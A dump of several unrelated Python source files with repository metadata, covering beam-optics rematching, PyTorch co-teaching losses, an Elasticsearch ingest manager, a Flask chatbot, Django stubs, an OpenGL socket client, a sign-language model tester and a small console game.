R22 = beta1/np.sqrt(beta1*beta2)
if nEmit is not False:
factor = np.sqrt(nEmit / (emit*pAve))
R11 *= factor
R12 *= factor
R22 *= factor
R21 *= factor
for i, ii in enumerate(x):
x0 = x[i]
xp0 = xp[i]
x[i] = R11 * x0 + R12 * xp0
xp[i] = R21*x0 + R22*xp0
return x, xp
def rematchXPlane(self, beta=False, alpha=False, nEmit=False):
x, xp = self.performTransformation(self.x, self.xp, beta, alpha, nEmit)
self.beam['x'] = x
self.beam['xp'] = xp
cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.yp * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def rematchYPlane(self, beta=False, alpha=False, nEmit=False):
y, yp = self.performTransformation(self.y, self.yp, beta, alpha, nEmit)
self.beam['y'] = y
self.beam['yp'] = yp
cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
cpx = self.xp * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def performTransformationPeakISlice(self, xslice, xpslice, x, xp, beta=False, alpha=False, nEmit=False):
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
eta1 = S16/S66 if S66 else 0
S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
etap1 = S26/S66 if S66 else 0
for i, ii in enumerate(x):
x[i] -= p[i] * eta1
xp[i] -= p[i] * etap1
S11, S12, S22 = self.computeCorrelations(xslice, xpslice)
emit = np.sqrt(S11*S22 - S12**2)
beta1 = S11/emit
alpha1 = -S12/emit
beta2 = beta if beta is not False else beta1
alpha2 = alpha if alpha is not False else alpha1
R11 = beta2/np.sqrt(beta1*beta2)
R12 = 0
R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
R22 = beta1/np.sqrt(beta1*beta2)
if nEmit is not False:
factor = np.sqrt(nEmit / (emit*pAve))
R11 *= factor
R12 *= factor
R22 *= factor
R21 *= factor
for i, ii in enumerate(x):
x0 = x[i]
xp0 = xp[i]
x[i] = R11 * x0 + R12 * xp0
xp[i] = R21*x0 + R22*xp0
return x, xp
def rematchXPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
peakIPosition = self.slice_max_peak_current_slice
xslice = self.slice_data(self.x)[peakIPosition]
xpslice = self.slice_data(self.xp)[peakIPosition]
x, xp = self.performTransformationPeakISlice(xslice, xpslice, self.x, self.xp, beta, alpha, nEmit)
self.beam['x'] = x
self.beam['xp'] = xp
cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.yp * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def rematchYPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
peakIPosition = self.slice_max_peak_current_slice
yslice = self.slice_data(self.y)[peakIPosition]
ypslice = self.slice_data(self.yp)[peakIPosition]
y, yp = self.performTransformationPeakISlice(yslice, ypslice, self.y, self.yp, beta, alpha, nEmit)
self.beam['y'] = y
self.beam['yp'] = yp
cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
cpx = self.xp * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
@property
def Sx(self):
return np.sqrt(self.covariance(self.x,self.x))
@property
def Sy(self):
return np.sqrt(self.covariance(self.y,self.y))
| [
"james.jones@stfc.ac.uk"
] | james.jones@stfc.ac.uk |
a10a9de1404877e2b17e00db80964d50a2eb3f96 | 5228a88054a55caacda2cbd35de5c0a8d8181b8b | /loss_functions/coteaching_loss.py | bbed83d34cbcb3d486950c4ba1a9e4f4d6c164f3 | [
"MIT"
] | permissive | MPCAICDM/MPCA | 6703e542978134788de49dc2094a47534f8267c3 | c996435a0578ea4160f934bc01041c2ef23468f3 | refs/heads/main | 2023-06-03T19:05:02.055861 | 2021-06-12T09:14:44 | 2021-06-12T09:14:44 | 376,187,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,845 | py | import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
import random
class CoTeachingLoss(nn.Module):
def __init__(self, noise_rate=0.1):
super(CoTeachingLoss, self).__init__()
self.mse = nn.MSELoss(reduction='none')
self.noise_rate = noise_rate
def forward(self, xr1, xr2, x):
mse1 = self.mse(xr1, x).mean(dim=(1,2,3))
mse2 = self.mse(xr2, x).mean(dim=(1,2,3))
idxsortd1 = mse1.argsort().detach()
idxsortd2 = mse2.argsort().detach()
#idxsortd1 = np.argsort(mse1.cpu().data)
#idxsortd2 = np.argsort(mse2.cpu().data)
#print(idxsortd1)
#print(mse1,mse2,idxsortd1,idxsortd2)
#return mse1.mean(), mse2.mean()
rem_num = int(x.size(0) * (1. - self.noise_rate))
return mse1[idxsortd2[:rem_num]].mean(), \
mse2[idxsortd1[:rem_num]].mean()
class CoTeachingResnetLoss(nn.Module):
def __init__(self, noise_rate=0.1, score_mode='pl_mean'):
super(CoTeachingResnetLoss, self).__init__()
self.noise_rate = noise_rate
self.score_mode = score_mode
self.softmax = nn.Softmax(dim=1)
def forward(self, o1, o2, labels):
ce1 = F.cross_entropy(o1, labels, reduction='none')
ce2 = F.cross_entropy(o2, labels, reduction='none')
idxsortd1 = ce1.argsort().detach()
idxsortd2 = ce2.argsort().detach()
rem_num = int(o1.size(0) * (1. - self.noise_rate))
return ce1[idxsortd2[:rem_num]].mean(), \
ce2[idxsortd1[:rem_num]].mean()
def pl_mean(self, x, labels):
raise NotImplementedError
def neg_entropy(self, x):
ne = self.softmax(x)
return (ne *torch.log2(ne)).sum(dim=1)
def predict(self, x, labels):
if self.score_mode == 'pl_mean':
return self.pl_mean(x, labels)
else:
return self.neg_entropy(x)
class InCoTeachingEstLoss(nn.Module):
def __init__(self, lamd, cpd_channels, mode, noise_rate=0.1):
super(InCoTeachingEstLoss, self).__init__()
self.mse = nn.MSELoss(reduction='none')
self.noise_rate = noise_rate
self.lamd = lamd
#self.lamd2 = 0.05
self.coteach_mode = mode # 'exchange' 'union' 'intersect'
self.cpd_channels = cpd_channels
# Avoid nans
self.eps = np.finfo(float).eps
def L21_error(self, x, x_r):
x = x.view(x.shape[0], -1)
x_r = x_r.view(x_r.shape[0], -1)
le = (torch.norm(x - x_r, p=2, dim=1)).mean()
return le
def Autoregress_error(self, z, z_dist):
z_d = z.detach()
# Apply softmax
z_dist = F.softmax(z_dist, dim=1)
# Flatten out codes and distributions
z_d = z_d.view(len(z_d), -1).contiguous()
z_dist = z_dist.view(len(z_d), self.cpd_channels, -1).contiguous()
# Log (regularized), pick the right ones
z_dist = torch.clamp(z_dist, self.eps, 1 - self.eps)
log_z_dist = torch.log(z_dist)
index = torch.clamp(torch.unsqueeze(z_d, dim=1) * self.cpd_channels, min=0,
max=(self.cpd_channels - 1)).long()
selected = torch.gather(log_z_dist, dim=1, index=index)
selected = torch.squeeze(selected, dim=1)
# Sum and mean
S = torch.sum(selected, dim=-1)
nll = -S
return nll
def forward(self, xr, x, z, z_dist):
x = x.view(x.shape[0], -1)
xr = xr.view(xr.shape[0], -1)
lmse = torch.norm(x - xr, p=2, dim=1)
idxsorted = lmse.argsort().detach().cpu().numpy()
rem_num = int(x.size(0) * (1. - self.noise_rate))
arg_err = self.Autoregress_error(z, z_dist)
zidxsorted = arg_err.argsort().detach().cpu().numpy()
if self.coteach_mode == 'exchange':
a = lmse[zidxsorted[:rem_num]].mean()
b = arg_err[idxsorted[:rem_num]].mean()
#c = arg_err[idxsorted[rem_num:]].mean()
loss = a + b * self.lamd
elif self.coteach_mode == 'neg':
a = lmse[zidxsorted[:rem_num]].mean()
b = arg_err[idxsorted[:rem_num]].mean()
c = arg_err[idxsorted[rem_num:]].mean()
loss = a + (b - c) * self.lamd
else:
loss = lmse.mean() + self.lamd * arg_err.mean()
#print(a.item(), b.item())
return loss, lmse, arg_err
class InCoTeachingHiddenLoss(nn.Module):
def __init__(self, lamd, noise_rate=0.1, group=2):
super(InCoTeachingHiddenLoss, self).__init__()
self.mse = nn.MSELoss(reduction='none')
self.noise_rate = noise_rate
self.group = group
self.lamd = lamd
self.lamd2 = 0.05
def L21_error(self, x, x_r):
x = x.view(x.shape[0], -1)
x_r = x_r.view(x_r.shape[0], -1)
le = (torch.norm(x - x_r, p=2, dim=1)).mean()
return le
def forward(self, xr, x, z):
L_mse = []
idxsorted = []
x = x.view(x.shape[0], -1)
#print(len(xr), xr[0].shape, x.shape, z.shape)
for ixr in xr:
ixr = ixr.view(ixr.shape[0], -1)
#print(x.shape, ixr.shape)
#lmse = self.mse(ixr, x).mean(dim=1)
lmse = torch.norm(x - ixr, p=2, dim=1)
#lmse = ixr.sub(x).pow(2).view(ixr.size(0), -1).sum(dim=1, keepdim=False)
L_mse.append(lmse)
idxsorted.append(lmse.argsort().detach().cpu().numpy())
rem_num = int(x.size(0) * (1. - self.noise_rate))
znorm = torch.norm(z, p=2, dim=1)
zidxsorted = znorm.argsort().detach().cpu().numpy()
shift = random.randint(0, self.group - 1)
loss = 0
#print(rem_num)
for i in range(self.group):
loss += L_mse[i][zidxsorted[:rem_num]].mean()
#loss += L_mse[i].mean()
return znorm[idxsorted[(shift)%self.group][:rem_num]].mean() * self.lamd + loss
#return znorm.mean()+loss
class InCoTeachingAgreeLoss(nn.Module):
def __init__(self, noise_rate=0.1, group=2):
super(InCoTeachingAgreeLoss, self).__init__()
self.mse = nn.MSELoss(reduction='none')
self.noise_rate = noise_rate
self.group = group
def forward(self, xr, x):
L_mse = []
idxsorted = []
for ixr in xr:
lmse = self.mse(ixr, x).mean(dim=(1,2,3))
L_mse.append(lmse)
idxsorted.append(lmse.argsort().detach().cpu().numpy())
rem_idx = int(x.size(0) * (1. - self.noise_rate))
loss = 0
agrees = idxsorted[0][:rem_idx]
for i in range(1, self.group):
agrees = np.intersect1d(agrees,idxsorted[i])
for i in range(self.group):
loss += L_mse[i][agrees].mean()
#loss += L_mse[i].mean()
return loss
class InCoTeachingLoss(nn.Module):
def __init__(self, noise_rate=0.1, group=2):
super(InCoTeachingLoss, self).__init__()
self.mse = nn.MSELoss(reduction='none')
self.noise_rate = noise_rate
self.group = group
def forward(self, xr, x):
L_mse = []
idxsorted = []
for ixr in xr:
lmse = self.mse(ixr, x).mean(dim=(1,2,3))
L_mse.append(lmse)
idxsorted.append(lmse.argsort().detach())
rem_num = int(x.size(0) * (1. - self.noise_rate))
shift = random.randint(1, self.group - 1)
loss = 0
for i in range(self.group):
loss += L_mse[i][idxsorted[(i+shift)%self.group][:rem_num]].mean()
#loss += L_mse[i].mean()
return loss
class MulCEInCoTeachingLoss(nn.Module):
def __init__(self, noise_rate=0.1, group=(2, 3, 3, 4), score_mode='pl_mean',
iter_per_epoch=100, smooth_epoch=0, oe_scale=None,
mask_group=None):
super(MulCEInCoTeachingLoss, self).__init__()
self.noise_rate = noise_rate
self.group = group
self.gsize = len(group)
self.softmax = nn.Softmax(dim=1)
self.score_mode = score_mode
self.noise_rate_schedule = []
for i in range(smooth_epoch):
self.noise_rate_schedule += [self.noise_rate * i / smooth_epoch] * iter_per_epoch
self.iter_count = 0
self.oe_scale = oe_scale
if mask_group is None:
self.mask_group = [False] * len(self.group)
else:
self.mask_group = mask_group
def get_noist_rate(self):
if self.iter_count < len(self.noise_rate_schedule):
ns = self.noise_rate_schedule[self.iter_count]
else:
ns = self.noise_rate
self.iter_count += 1
return ns
def forward(self, x, labels):
noise_rate = self.get_noist_rate()
Lce = []
now = 0
idxsorted = []
for i in range(len(self.group)):
if not self.mask_group[i]:
lce = F.cross_entropy(x[:, now: now+self.group[i]], labels[i], reduction='none')
Lce.append(lce)
idxsorted.append(lce.argsort().detach())
now += self.group[i]
#print(now)
rem_num = int(x.size(0) * (1. - noise_rate))
shift = random.randint(0, len(Lce) - 1)
loss = 0
for i in range(len(Lce)):
loss += Lce[i][idxsorted[(i+shift)%len(Lce)][:rem_num]].mean()
#loss += Lce[i].mean()
if self.oe_scale is not None:
oe_num = -int(x.size(0) * noise_rate * self.oe_scale)
now = 0
for i in range(len(self.group)):
if not self.mask_group[i]:
xi = x[idxsorted[(i + shift) % len(Lce)][oe_num:], now:now + self.group[i]]
loss += -0.1 * (xi.mean(dim=1) - torch.logsumexp(xi, dim=1)).mean()
now += self.group[i]
return loss
def pl_mean(self, x, labels):
Lce = []
now = 0
#print(x.shape, labels[0].shape)
for i in range(len(self.group)):
if not self.mask_group[i]:
lce = -F.cross_entropy(x[:, now: now + self.group[i]], labels[i], reduction='none')
Lce.append(lce)
now += self.group[i]
loss = 0
for i in range(len(Lce)):
loss += Lce[i]
return loss
def neg_entropy(self, x):
neg_entropy = 0
now = 0
for i in range(len(self.group)):
if not self.mask_group[i]:
ne = self.softmax(x[:, now: now+self.group[i]])
ne = ne * torch.log2(ne)
ne = ne.sum(dim=1)
neg_entropy += ne
now += self.group[i]
return neg_entropy
def predict(self, x, labels):
if self.score_mode == 'pl_mean':
return self.pl_mean(x, labels)
else:
return self.neg_entropy(x) | [
"mpca"
] | mpca |
a0fb061548bfd69cb764cc4823ae29227aa804a6 | 0e8ab63a60fd03b1778aa392c0b11fedd88409e4 | /ingest/ingest/manager.py | 8ed7b3d707ce64b45eb7b82fa5323c3a84a15a39 | [] | no_license | Kyeongrok/dms | babeb19115355c3d930c94c89ca55d3e5de2dc55 | a67c446f0ffd3f9a1812de961ef915c405a4096f | refs/heads/master | 2021-06-23T22:44:18.881538 | 2019-09-26T03:42:13 | 2019-09-26T03:42:13 | 210,993,619 | 0 | 0 | null | 2021-03-25T22:57:32 | 2019-09-26T03:41:24 | Python | UTF-8 | Python | false | false | 2,747 | py | import abc
import logging
import os
from dmsclient.client import DMSClient
from dmsclient.exceptions import DMSClientException
from ingest import util
from ingest.logger import ElasticsearchHandler, JournalFormatter
class AbstractIngestManager(abc.ABC):
def __init__(self, config, mount_path, reader_id, cartridge_id):
self.log = logging.getLogger('ingest.manager')
self.config = config
self.thread_count = config['general']['threads']
self.check_mountpoints = config['general']['check_mountpoints']
self.ignore_directories = config['general']['ignore_directories']
self.log_to_es = config['general']['log_to_es']
self.mount_path = mount_path
self.reader_id = reader_id
self.cartridge_id = cartridge_id
self.client = DMSClient(es_endpoint=config['elasticsearch']['endpoint'],
es_user=config['elasticsearch']['user'],
es_password=config['elasticsearch']['password'],
create_templates=config['elasticsearch']['create_templates'],
verify_templates=config['elasticsearch']['verify_templates'])
if self.log_to_es:
handler = ElasticsearchHandler(self.client)
formatter = JournalFormatter()
handler.setFormatter(formatter)
root_logger = logging.getLogger('ingest')
root_logger.addHandler(handler)
if not self.mount_path.startswith('rsync://'):
try:
self.mount_path = os.path.abspath(self.mount_path)
self.__check_path(self.mount_path, readwrite=False)
except Exception as e:
self.log.error('Error checking the input path. {}'.format(str(e),))
raise e
def update_reader(self, message):
if self.reader_id:
self.client.readers.set_message(self.reader_id, message)
def set_cartridge_workflow_type(self, cartridge_id, workflow_type):
if self.cartridge_id:
self.client.cartridges.set_workflow_type(self.cartridge_id, workflow_type)
@abc.abstractmethod
def run(self):
pass
def __check_path(self, path, readwrite=False):
if path.startswith('rsync://'):
return
if readwrite:
self.log.info("Checking write permissions on path '%s'" % (path,))
if not util.isWritable(path):
raise Exception('Cannot write to directory: %s' % (path,))
else:
self.log.info("Checking read permissions on path '%s'" % (path,))
if not util.isReadable(path):
raise Exception('Cannot read from directory: %s' % (path,))
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
1d3aa6d35106c3460d100c2156236cc0871312ec | fc5becca3e2e48a444b512e059df1cd21601829b | /Aulas/Aula19A.py | 4d8089077e3bdd14ae5f3b3b6ced29a4100d4556 | [
"MIT"
] | permissive | Felix-xilef/Curso-de-Python | c44bf8c22b393aefaed3a2bb3127ef7999e27fb8 | cdff7c7f3850e6326e274c8c1987b9e1a18ce910 | refs/heads/master | 2021-05-19T11:09:22.644638 | 2020-04-01T22:09:02 | 2020-04-01T22:09:02 | 251,665,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | # Dicionários {} / dict() - como uma lista, porém o indice pode ser definido (key)
pessoas = {'nome': 'Felix', 'sexo': 'm', 'idade': 18}
print(pessoas)
print(pessoas['nome'])
print(pessoas['idade'])
print(pessoas.values())
print(pessoas.keys())
print(pessoas.items())
for k, v in pessoas.items():
print(k, '=', v)
del pessoas['sexo']
print(pessoas)
pessoas['nome'] = 'Gustavo'
print(pessoas)
pessoas['peso'] = 74
print(pessoas)
input('\n\nPressione <enter> para continuar')
| [
"felixpb@yahoo.com.br"
] | felixpb@yahoo.com.br |
df89fe54c78053bec5a45d0838e0a6ff946f03f1 | bf7555ce71cb5ac6472a61fc9d229c2256ba6d10 | /board/views.py | ff8a125724037360f8fd26b63a9b2c08463b1cf7 | [] | no_license | vivideljo/my-first-board | 29b29226fe213e5f2fd9c658733a1a7701f057ff | d8c78ba9c7162bc9c2a12cef725c9ea856a049aa | refs/heads/master | 2020-04-04T10:05:01.083793 | 2018-11-02T09:56:29 | 2018-11-02T09:56:29 | 155,842,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.shortcuts import render
# Create your views here.
def post_list(request):
return render(request, 'board/post_list.html', {})
| [
"vivideljo@gmail.com"
] | vivideljo@gmail.com |
c4b90c1495df475c554108312c8e2a94b88ee10d | ef66e297a49d04098d98a711ca3fda7b8a9a657c | /Python/display.py | 1b280e0ad29c46c1e08530191b08e20ef0df52eb | [] | no_license | breezy1812/MyCodes | 34940357954dad35ddcf39aa6c9bc9e5cd1748eb | 9e3d117d17025b3b587c5a80638cb8b3de754195 | refs/heads/master | 2020-07-19T13:36:05.270908 | 2018-12-15T08:54:30 | 2018-12-15T08:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,897 | py | # coding: UTF-8
__metaclass__ = type
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import random
import socket
i = 0
winId = 0
s = None
poses = []
SIZE = [800, 600]
clear = True
def Draw():
global poses
global clear
glEnable(GL_POINT_SMOOTH)
if clear:
glClear(GL_COLOR_BUFFER_BIT)
clear = False
glPointSize(5)
glBegin(GL_POINTS)
for item in poses:
try:
if item[2] == 1:
glVertex2f(item[0], item[1])
elif item[2] == -1:
clear = True
except:
pass
poses = []
glEnd()
glFlush()
def Update():
global s
global poses
try:
data = s.recv(4096).split('|')
poses = map(lambda x: map(lambda y: int(y), x.split(',')), data)
if not data:
raise Exception
except Exception, e:
print e
s.close()
sys.exit(0)
for item in poses:
item[0] = (item[0]*1.0/SIZE[0]*200-100)/100.0
item[1] = -((item[1]*1.0/SIZE[1]*200-100))/100.0
print poses
glutPostRedisplay()
def keyboardHit(key, mouseX, mouseY):
if key == 'q':
global s
glutDestroyWindow(winId)
s.close()
sys.exit()
def mouseHit(button, state, mouseX, mouseY):
pass
def mouseMotion(mouseX, mouseY):
pass
def main():
global winId
global s
s = socket.socket()
host = socket.gethostname()
s.connect((host, 1234))
glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGBA)
glutInitWindowSize(SIZE[0], SIZE[1])
winId = glutCreateWindow("David")
glutDisplayFunc(Draw)
glutIdleFunc(Update)
glutKeyboardFunc(keyboardHit)
glutMouseFunc(mouseHit)
glutMotionFunc(mouseMotion)
glutMainLoop()
if __name__ == '__main__':
try:
main()
except Exception, e:
print e
| [
"youchen.du@gmail.com"
] | youchen.du@gmail.com |
83e2c01818bddb7fae6580e5e2ebc1b0d46fe323 | 13f49f029dcac3ae64021e6e97964824116e33b9 | /manage.py | 93193becb0cf9874da6917f77aca71762680df1f | [] | no_license | bds511/DjangoGirls_Blog | 3bd1fe69d12a52367f7181ab98e57f154466a3f9 | 3630405ada79fba5d499abb7676ca1dfde61169e | refs/heads/master | 2020-07-25T20:00:24.989622 | 2019-09-14T08:09:04 | 2019-09-14T08:09:04 | 208,409,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangogo.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"pypy7000@korea.ac.kr"
] | pypy7000@korea.ac.kr |
9be123668b9ef5ff48a363b8a30c21ac7e1c161c | 1cedbf7e752a0eb11e141b1fc6fb29c3752657d3 | /CH05A-BK_Bot_Web_App.py | dd44bd0a59bb7f8f5d00b5a7c46f934092ee4884 | [] | no_license | fabricerjsjoseph/CH05-Byron-Katie-Bot-4-on-Flask | 260ae633d63aec2b630ccb199b21b86e71c4777b | 0e7cd8b07004dd3931296daba04b32e343ac91b6 | refs/heads/master | 2022-04-11T11:52:19.259889 | 2020-02-16T08:00:51 | 2020-02-16T08:00:51 | 236,722,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,727 | py |
# import open source modules
import glob
import re
# import private modules
from Turnaround_One import turnaround_one_generator
from Turnaround_Two import turnaround_two_generator
from Turnaround_Three import turnaround_three_generator
# UNPACKING DATA STORED IN TEXT FILES
# Import all text files in working directory
txt_list=glob.glob(r"Txt/*.txt")
# Initialise empty to store data from text files
master_list=[]
# Read each text file and store data in master_list
for txt in txt_list:
with open(txt,'r',encoding='utf-8') as f:
data=f.readlines()
data=[re.sub('\n','',item) for item in data]
master_list.append(data)
# Store all BOT generated statements such as greetings in list
statements_list=master_list[0]
# Store all questions in list
four_questions_list=master_list[1]
# Store all guidelines to questions in list
four_questions_guidance_list=master_list[2]
# Store all turnaround questions & related messages
turnarounds_list=master_list[3]
# Initialise list to store user inputs
user_message_log=[]
# Initialise list to store chatbot responses
all_bot_responses_list=[]
def gen_all_bot_responses(first_message):
# Generate the 4 questions based on the user's 1st message
for question_no in range(4):
response='LUCY: ' + four_questions_list[question_no]+' {}?'.format(first_message)
all_bot_responses_list.append(response)
# Display the 3 statements of the turnaround sections
tr_statement_1='LUCY: '+ turnarounds_list[0]+' {}'.format(first_message)+'... type OK to continue.'
tr_statement_2='LUCY: '+ turnarounds_list[1]+' type OK to continue.'
tr_statement_3='LUCY: '+ turnarounds_list[2]+'.. type OK to continue.'
all_bot_responses_list.extend([tr_statement_1,tr_statement_2,tr_statement_3])
# Generate the three turnaround questions based on the user's 1st message
turnaround_one='LUCY: ' + turnarounds_list[3]+' {}'.format(turnaround_one_generator(first_message))
turnaround_two='LUCY: ' + turnarounds_list[4]+' {}'.format(turnaround_two_generator(first_message))
turnaround_three='LUCY: ' + turnarounds_list[5]+' {}'.format(turnaround_three_generator(first_message))
all_bot_responses_list.extend([turnaround_one,turnaround_two,turnaround_three])
# Add Closing Statement
closing_statement=statements_list[1]+' {}'.format(first_message)
all_bot_responses_list.append(closing_statement)
return all_bot_responses_list
def bot_response(user_message):
# Add user's message to list
user_message_log.append(user_message)
# Calculate no of user messages stored in list
no_messages=len(user_message_log)
# Only run bot_response function once
if no_messages==1:
# Generate all bot reponses based on 1st user message
gen_all_bot_responses(user_message_log[0])
# Add bot message to conversation list
response= all_bot_responses_list[no_messages-1]
return response
from flask import Flask, render_template, request
# Create the App Object
app = Flask(__name__)
# Change Flask environment from Production to Development
#get_ipython().run_line_magic('env', 'FLASK_ENV=development')
@app.route("/")
def home():
return render_template("home.html")
@app.route("/get")
def get_bot_response():
user_message = request.args.get('msg')
return str(bot_response(user_message))
# import webbrowser module
import webbrowser
# Register webbrowser
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None,webbrowser.BackgroundBrowser(chrome_path))
if __name__ == "__main__":
webbrowser.get('chrome').open_new('http://127.0.0.1:5000/')
app.run(debug=False)
| [
"60127514+fabricerjsjoseph@users.noreply.github.com"
] | 60127514+fabricerjsjoseph@users.noreply.github.com |
e57f6351bc13444d18ec9ae6b667d6e3d4b37ed4 | a7e75fcd05aa8ebf2066c4eb0a05496042dd5ded | /better_work_data/better_work_data/items.py | ab7aeb32e62a563ca44dce609a18c2de91fd0b79 | [
"MIT"
] | permissive | JackDan9/miniProgram | d6fe14fced0f9a154d01a6f950ab26325ed445de | d60a33275334b4caa3c15d5c6196938fb800505b | refs/heads/master | 2023-02-10T13:26:23.453536 | 2023-01-09T03:41:43 | 2023-01-09T03:41:43 | 132,235,452 | 1 | 0 | MIT | 2023-02-08T00:42:41 | 2018-05-05T09:55:32 | JavaScript | UTF-8 | Python | false | false | 515 | py | # Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class BetterWorkDataItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
order = scrapy.Field()
title = scrapy.Field()
summary = scrapy.Field()
source_type = scrapy.Field()
source_name = scrapy.Field()
publish_on = scrapy.Field()
created_on = scrapy.Field()
updated_on = scrapy.Field()
pass
| [
"1835812864@qq.com"
] | 1835812864@qq.com |
26761316ecfc0c6a20c536f8657d987f843af9c0 | 4714723a2ac6b230640a766c3f786e8b5cad6c6e | /static_test_model.py | 93383a676ba15c66a05beba0580e0f34e0a1b251 | [] | no_license | Deeathex/RealTimeSignLanguageRecognition | 622ff1b2a78496b1b73bba68aeec4f3528e07795 | c131741f006b4d6154341a64a1777e8989a375c0 | refs/heads/master | 2020-06-06T05:25:43.382716 | 2019-07-04T15:06:36 | 2019-07-04T15:06:36 | 192,610,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,374 | py | from tensorflow.python.keras.models import load_model
import numpy as np
import os
from tensorflow.python.keras.preprocessing import image
import constants as constant
import utils
class StaticTestModel:
def __init__(self, model_filename):
self.model_filename = model_filename
self.classifier = load_model(constant.MODEL_METRICS_DIRECTORY + model_filename)
def predict(self, image_path):
test_image = image.load_img(image_path, grayscale=True)
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis=0)
result = self.classifier.predict(test_image)
current_result = utils.get_letter_based_on_prediction(result)
return utils.get_correct_character_for_special_characters(current_result)
def test_model_with_alphabet(self, images_format='.JPG'):
global_correct_classification_count = 0
global_total_examples_count = 0
for subdir, dirs, files in os.walk(constant.TEST_DATA_DIRECTORY):
split_list = subdir.split('TestData/')
actual_letter = split_list[1]
print(actual_letter)
correct_classification_count = 0
total_examples_count = 0
if files:
for file in files:
image_path = os.path.join(subdir, file)
predicted_letter = self.predict(image_path)
total_examples_count += 1
if actual_letter == predicted_letter:
correct_classification_count += 1
print('Correctly classified: ' + str(correct_classification_count))
acc = correct_classification_count / total_examples_count
global_correct_classification_count += correct_classification_count
global_total_examples_count += total_examples_count
print('Accuracy: ' + str(acc))
print('Global correctly classified: ' + str(global_correct_classification_count) + "/" + str(
global_total_examples_count))
global_acc = global_correct_classification_count / global_total_examples_count
print('Global accuracy: ' + str(global_acc))
# test_model_A = StaticTestModel('model_saved_2019-06-18.h5')
test_model = StaticTestModel('model_saved_2019-06-20.h5')
test_model.test_model_with_alphabet()
| [
"andreea_ciforac@yahoo.com"
] | andreea_ciforac@yahoo.com |
fdda2d1b337921b8f011f818239c1ab267043919 | 3d9586a7f5891c11cd18c96d0a1a86f7aad2ae50 | /snake_water_gun_game.py | 221a45b2a2083b340bb247029e32348d55258141 | [] | no_license | Raitry333/CodeWithHarry | cb77d99ed87b0be59e736c0b86e515940985a70a | f95d704f3bd99894dd8c97776e03b7df0552d6cb | refs/heads/main | 2023-06-06T01:35:49.250155 | 2021-06-21T14:50:13 | 2021-06-21T14:50:13 | 378,957,162 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | import random
lst=["s","g","w"]
print("WELCOME TO MY GAME!!!!")
print("CHOOSE 'S' FOR SNAKE")
print("CHOOSE 'g' FOR GUN")
print("CHOOSE 'w' FOR WATER")
i=1
your_point=0
comp_point=0
while(i<11):
inp=input("WHAT'S YOUR CHOICE?\n")
chc=random.choice(lst)
print(chc)
if(inp=="s" and chc=="w"):
print("WIN!!!!")
your_point=your_point+1
i=i+1
elif(inp=="w" and chc=="s"):
print("LOSE:(")
comp_point=comp_point+1
i=i+1
elif(inp=="w" and chc=="g"):
print("WIN!!!!")
your_point=your_point+1
i=i+1
elif(inp=="g" and chc=="w"):
print("LOSE:(")
comp_point=comp_point+1
i=i+1
elif(inp=="g" and chc=="s"):
print("WIN!!!!")
your_point=your_point+1
i=i+1
elif(inp=="s" and chc=="g"):
print("LOSE:(")
comp_point=comp_point+1
i=i+1
elif(inp=="s" and chc=="s"):
print("TIE")
i=i+1
elif(inp=="w" and chc=="w"):
print("TIE")
i=i+1
elif(inp=="g" and chc=="g"):
print("TIE")
i=i+1
if(i>=11):
print("GAME OVER!!!")
if(your_point>comp_point):
print("YOU'RE THE WINNER!\n YOUR POINT IS\n",your_point)
print("COMPUTER'S POINT IS\n",comp_point)
if(your_point<comp_point):
print("YOU LOSE!:(\n YOUR POINT IS\n",your_point)
print("COMPUTER'S POINT IS\n",comp_point)
if(your_point==comp_point):
print("IT'S A TIE!")
print("YOUR POINT IS\n",your_point)
print("COMPUTER'S POINT IS\n",comp_point)
| [
"noreply@github.com"
] | Raitry333.noreply@github.com |
